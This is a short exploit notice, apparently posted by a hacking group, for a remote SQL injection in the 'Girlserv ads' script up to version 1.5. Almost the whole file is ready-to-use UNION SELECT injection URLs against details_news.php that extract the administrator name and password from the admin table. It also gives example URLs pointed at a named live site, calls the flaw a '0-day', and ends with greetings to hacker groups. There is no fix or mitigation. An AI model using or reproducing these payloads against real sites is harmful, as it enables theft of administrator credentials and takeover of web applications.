girlserv-sql.txt

`Girlserv ads <= 1.5 Remote SQL Injection Vulnerability  
  
Found By : Cold z3ro , [email protected]  
  
Homepages : http://hackteach.org , http://h4ps.com  
  
Script : http://www.girlserv-demo.com/girlserv-ads1.5.zip  
  
For Admin :  
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*  
For password :  
/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*  
  
Example ;  
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_name,3,4/**/from/**/admin/**/where%20admin_id=1/*  
http://www.girlserv.com/ads/details_news.php?n=det&idnew=-1/**/union/**/select/**/0,1,admin_password,3,4/**/from/**/admin/**/where%20admin_id=1/*  
  
=================================================  
0-day Exploit :)  
=================================================  
Greets : Hackteach members , Pal-hacker.com admins , xp10.com members , and  
All friend  
=============================================  
Cold !F iT z3ro , No One Equal One  
=============================================  
  
#Long life Palestine  
#http://hackteach.org  
  
`